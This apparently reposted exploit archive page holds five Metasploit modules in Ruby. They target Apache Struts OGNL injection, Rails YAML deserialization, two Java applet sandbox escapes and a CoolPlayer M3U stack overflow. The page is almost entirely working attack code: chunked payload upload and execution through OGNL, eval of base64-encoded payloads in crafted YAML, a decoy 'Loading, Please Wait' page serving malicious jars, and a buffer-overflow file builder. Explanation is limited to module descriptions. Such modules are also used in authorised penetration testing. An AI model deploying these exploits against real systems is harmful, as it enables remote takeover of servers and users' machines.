Archive for Remote Exploits

Apache Struts ParametersInterceptor Remote Code Execution

Apache Struts ParametersInterceptor Remote Code Execution Metasploit Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
        for the use of parentheses which in turn allows it to interpret parameter values as
        OGNL expressions during certain exception handling for mismatched data types of
        properties which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
          'mihi' #ARCH_JAVA support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3923'],
          [ 'OSVDB', '78501'],
          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
        ],
      'Platform'      => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'windows'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'Oct 01 2011',
      'DefaultTarget' => 2))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
    ], self.class)
  end

  def execute_command(cmd, opts = {})
    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
    uri = String.new(datastore['TARGETURI'])
    uri = normalize_uri(uri)
    uri.gsub!(/INJECT/,inject) # append the injection string
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    })
    return resp #Used for check function.
  end

  def exploit
    #Set up generic values.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    append = 'false'
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
    end

    #Now with all the arch specific stuff set, perform the upload.
    #109 = length of command string plus the max length of append.
    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
    chunk_length = 2048 - sub_from_chunk
    chunk_length = ((chunk_length/4).floor)*3
    while pl_exe.length > chunk_length
      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
    java_upload_part(pl_exe,@payload_exe,append)
    execute_command(chmod_cmd) if target['Platform'] == 'linux'
    execute_command(exec_cmd)
    register_files_for_cleanup(@payload_exe)
  end

  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd << "#f.close()"
    execute_command(cmd)
  end

  def check
    sleep_time = datastore['CHECK_SLEEPTIME']
    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
    t1 = Time.now
    print_status("Asking remote server to sleep for #{sleep_time} seconds")
    response = execute_command(check_cmd)
    t2 = Time.now
    delta = t2 - t1


    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
    end
  end

end

Ruby on Rails JSON Processor YAML Deserialization Code Execution

Ruby on Rails JSON Processor YAML Deserialization Code Execution remote metasploit exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
			'Description'    => %q{
					This module exploits a remote code execution vulnerability in the
				JSON request processor of the Ruby on Rails application framework.
				This vulnerability allows an attacker to instantiate a remote object,
				which in turn can be used to execute any ruby code remotely in the
				context of the application. This vulnerability is very similar to
				CVE-2013-0156.

				This module has been tested successfully on RoR 3.0.9, 3.0.19, and
				2.3.15.

				The technique used by this module requires the target to be running a
				fairly recent version of Ruby 1.9 (since 2011 or so). Applications
				using Ruby 1.8 may still be exploitable using the init_with() method,
				but this has not been demonstrated.

			},
			'Author'         =>
				[
					'jjarmoc',  # Initial module based on cve-2013-0156, testing help
					'egypt',    # Module
					'lian',     # Identified the RouteSet::NamedRouteCollection vector
				],
			'License'        => MSF_LICENSE,
			'References'  =>
				[
					['CVE', '2013-0333'],
				],
			'Platform'       => 'ruby',
			'Arch'           => ARCH_RUBY,
			'Privileged'     => false,
			'Targets'        =>	[ ['Automatic', {} ] ],
			'DisclosureDate' => 'Jan 28 2013',
			'DefaultOptions' => { "PrependFork" => true },
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
				OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])

			], self.class)

	end

	#
	# Create the YAML document that will be embedded into the JSON
	#
	def build_yaml_rails2

		code = Rex::Text.encode_base64(payload.encoded)
		yaml =
			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
			"eval(%[#{code}].unpack(%[m0])[0]);' " +
			": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
			":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
			":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
		yaml.gsub(':', '\u003a')
	end


	#
	# Create the YAML document that will be embedded into the JSON
	#
	def build_yaml_rails3

		code = Rex::Text.encode_base64(payload.encoded)
		yaml =
			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
		yaml.gsub(':', '\u003a')
	end

	def build_request(v)
		case v
		when 2; build_yaml_rails2
		when 3; build_yaml_rails3
		end
	end

	#
	# Send the actual request
	#
	def exploit

		[2, 3].each do |ver|
			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
			send_request_cgi({
				'uri'     => normalize_uri(target_uri.path),
				'method'  => datastore['HTTP_METHOD'],
				'ctype'   => 'application/json',
				'headers' => { 'X-HTTP-Method-Override' => 'get' },
				'data'    => build_request(ver)
			}, 25)
			handler
		end

	end
end

Java Applet Method Handle Remote Code Execution

Java Applet Method Handle Remote Code Execution metasploit remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	def initialize( info = {} )

		super( update_info( info,
			'Name'          => 'Java Applet Method Handle Remote Code Execution',
			'Description'   => %q{
					This module abuses the Method Handle class from a Java Applet to run arbitrary
				Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
				earlier.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability discovery at security-explorations.com
					'juan vazquez' # Metasploit module
				],
			'References'    =>
				[
					[ 'CVE', '2012-5088' ],
					[ 'URL', '86352' ],
					[ 'BID', '56057' ],
					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 16 2012'
		))
	end


	def setup
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")
		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")
		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

		@exploit_class_name = rand_text_alpha("Exploit".length)
		@exploit_class.gsub!("Exploit", @exploit_class_name)
		super
	end

	def on_request_uri(cli, request)
		print_status("handling request for #{request.uri}")

		case request.uri
		when /\.jar$/i
			jar = payload.encoded_jar
			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
			jar.add_file("B.class", @loader_class)
			metasploit_str = rand_text_alpha("metasploit".length)
			payload_str = rand_text_alpha("payload".length)
			jar.entries.each { |entry|
				entry.name.gsub!("metasploit", metasploit_str)
				entry.name.gsub!("Payload", payload_str)
				entry.data = entry.data.gsub("metasploit", metasploit_str)
				entry.data = entry.data.gsub("Payload", payload_str)
			}
			jar.build_manifest

			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
		when /\/$/
			payload = regenerate_payload(cli)
			if not payload
				print_error("Failed to generate the payload.")
				send_not_found(cli)
				return
			end
			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
		else
			send_redirect(cli, get_resource() + '/', '')
		end

	end

	def generate_html
		html  = %Q|<html><head><title>Download</title></head>|
		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
		html += %Q|</applet></body></html>|
		return html
	end

end

Java Applet AverageRangeStatisticImpl Remote Code Execution

Java Applet AverageRangeStatisticImpl Remote Code Execution metasploit exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	def initialize( info = {} )

		super( update_info( info,
			'Name'          => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',
			'Description'   => %q{
					This module abuses the AverageRangeStatisticImpl from a Java Applet to run
				arbitrary Java code outside of the sandbox, a different exploit vector than the one
				exploited in the wild in November of 2012. The vulnerability affects Java version
				7u7 and earlier.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability discovery at security-explorations
					'juan vazquez' # Metasploit module
				],
			'References'    =>
				[
					[ 'CVE', '2012-5076' ],
					[ 'OSVDB', '86363' ],
					[ 'BID', '56054' ],
					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 16 2012'
		))
	end


	def setup
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

		@exploit_class_name = rand_text_alpha("Exploit".length)
		@exploit_class.gsub!("Exploit", @exploit_class_name)
		super
	end

	def on_request_uri(cli, request)
		print_status("handling request for #{request.uri}")

		case request.uri
		when /\.jar$/i
			jar = payload.encoded_jar
			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
			jar.add_file("B.class", @loader_class)
			metasploit_str = rand_text_alpha("metasploit".length)
			payload_str = rand_text_alpha("payload".length)
			jar.entries.each { |entry|
				entry.name.gsub!("metasploit", metasploit_str)
				entry.name.gsub!("Payload", payload_str)
				entry.data = entry.data.gsub("metasploit", metasploit_str)
				entry.data = entry.data.gsub("Payload", payload_str)
			}
			jar.build_manifest

			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
		when /\/$/
			payload = regenerate_payload(cli)
			if not payload
				print_error("Failed to generate the payload.")
				send_not_found(cli)
				return
			end
			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
		else
			send_redirect(cli, get_resource() + '/', '')
		end

	end

	def generate_html
		html  = %Q|<html><head><title>Download</title></head>|
		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
		html += %Q|</applet></body></html>|
		return html
	end

end

CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow

CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow Remote Exploit

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=##     _                   __           __       __                     ##   /' \            __  /'__`\        /\ \__  /'__`\                   ##  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           ##  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          ##     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           ##      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           ##       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           ##                  \ \____/ >> Exploit database separated by exploit   ##                   \/___/          type (local, remote, DoS, etc.)    ##                                                                      ##  [+] Site            : 1337day.com                                   ##  [+] Support e-mail  : submit[at]1337day.com                         ##                                                                      ##               #########################################              ##               I'm The Black Devils member from Inj3ct0r Team         ##               #########################################              ##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-## Greeting To : r0073r / KedAns-Dz / All DZ Hackerz require 'msf/core' class Metasploit3 < Msf::Exploit::RemoteRank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {})super(update_info(info,'Name'           => 'CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow','Description'    => %q{This module exploits a stack-based buffer overflow in CoolplayerPlus 2.19.4  An attacker must send the file to the victim and the victim must open the file.},'License'        => MSF_LICENSE,'Author'         => ['The Black Devils',      # Initial Discovery],'Version'        => '$Revision: $','References'     =>[[ 'URL', 'http://1337day.com/exploits/20148' ],],'DefaultOptions' =>{'EXITFUNC' => 'process','DisablePayloadHandler' => 'true',},'Payload'        =>{'Space'    => 268,'BadChars' => "\x00\x0a\x0d",},'Platform' => 'win','Targets'        =>[[ 'Windows Universal', { 'Ret' => 0x77f31d8a } ], ],'Privileged'     => false,'DisclosureDate' => 'Janury 17 2013 ','DefaultTarget'  => 0)) register_options([OptString.new('FILENAME', [ true, 'The file name.',  'inj3ctor.m3u']),], self.class)end def exploit m3u = rand_text_alpha_upper(220) + [target.ret].pack('V')m3u << make_nops(12)m3u << payload.encoded print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(m3u) end end # FA90F81A4D4D6BB1   1337day.com [2013-01-27]   FD865C614C897B00 #